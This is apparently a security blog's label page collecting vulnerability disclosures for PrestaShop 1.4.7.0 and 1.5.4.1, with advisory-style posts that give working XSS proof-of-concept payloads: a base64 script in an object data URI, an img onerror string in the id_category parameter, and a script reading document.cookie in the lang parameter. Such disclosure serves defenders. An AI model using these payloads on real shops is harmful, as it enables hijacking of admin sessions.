Last days I started to check code of latest PrestaShop and I found few vulnerabilities
in code.
Post will be updated as soon as vendor will answer, what does he think about it.
Showing posts with label prestashop. Show all posts
Showing posts with label prestashop. Show all posts
Friday, 31 January 2014
Thursday, 2 May 2013
[EN] PrestaShop 1.5.4.1 HTLM Injection
This is very nice e-commerce shop, but I think using this preg_match:
will not secure us from HTML Injection attacks.
See the screen below to understand where and how we can input HTML tags:
... and yes, this vulnerability exists in admin's part of application. ;)
* UPDATE *
After a few minutes I've got the idea how to extend this html injection attack to XSS, and...
there is a XSS vulnerability :)
Screen from attack is below but payload-string will not be published until vendor response.
* UPDATE - 17.05.2013 *
Ok, still no response from vendor... :)
Proof of concept code to inject XSS in PrestaShop should be payload encoded by base64:
Here we have a little example:
Tadam... ;]
Cheers o/
 |
| preg_match() in latest PrestaShop |
See the screen below to understand where and how we can input HTML tags:
 |
| How to exploit PrestaShop via BurpSuite |
... and yes, this vulnerability exists in admin's part of application. ;)
* UPDATE *
After a few minutes I've got the idea how to extend this html injection attack to XSS, and...
there is a XSS vulnerability :)
Screen from attack is below but payload-string will not be published until vendor response.
 | |
| PrestaShop - Admin XSSed |
* UPDATE - 17.05.2013 *
Ok, still no response from vendor... :)
Proof of concept code to inject XSS in PrestaShop should be payload encoded by base64:
Here we have a little example:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>Tadam... ;]
Cheers o/
Sunday, 18 March 2012
[EN]PrestaShop 1.4.7.0 - XSS-over-GET for/from admin
# TITLE ....... # XSS-over-GET in PrestaShop 1.4.7.0 (for/from admin only) .... #
# DATE ........ # 14.03.2012 ................................................. #
# AUTOHR ...... # http://hauntit.blogspot.com ................................ #
# SOFT LINK ... # http://www.prestashop.com .................................. #
# VERSION ..... # 1.4.7.0 .................................................... #
# TESTED ON ... # LAMP ....................................................... #
# ............................................................................ #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
Simple XSS this time "for admin user only".
What's that mean:
To see vulnerability, go to Your login page and login as an admin.
Next in URL bar type 3).
#............................................#
# 3. Where is bug :)
http://prestashop_1.4.7.0/prestashop/admin12/index.php?tab=AdminCatalog&id_category=");<img src=moc onerror=alert(141012)>&categoryOrderby=name&categoryOrderway=asc&token=token
Vulnerable parameter is id_category.
By the way, there is one funny thing I found in this webapp too:
when You will set up parameter 'categoryOrderby' to '//%e00' (without ''), response will be 200 but page will... 'changed' ;]
hf
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
[EN] PrestaShop 1.4.7.0 - XSS for logged-in users
# TITLE ....... # PrestaShop 1.4.7.0 XSS for loged-in users ............. #
# DATE ........ # 14.03.2012 ............................................ #
# AUTOHR ...... # http://hauntit.blogspot.com ........................... #
# SOFT LINK ... # http://www.prestashop.com ............................. #
# VERSION ..... # 1.4.7.0 ............................................... #
# TESTED ON ... # LAMP .................................................. #
# ....................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
XSS for logged-in users.
#............................................#
# 3. Where is bug :)
Log in as Your 'normal user'.
And enjoy:
http:///prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*&type=front&token=your.token
#............................................#
# 4. More...
- http://www.prestashop.com
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
Subscribe to:
Posts (Atom)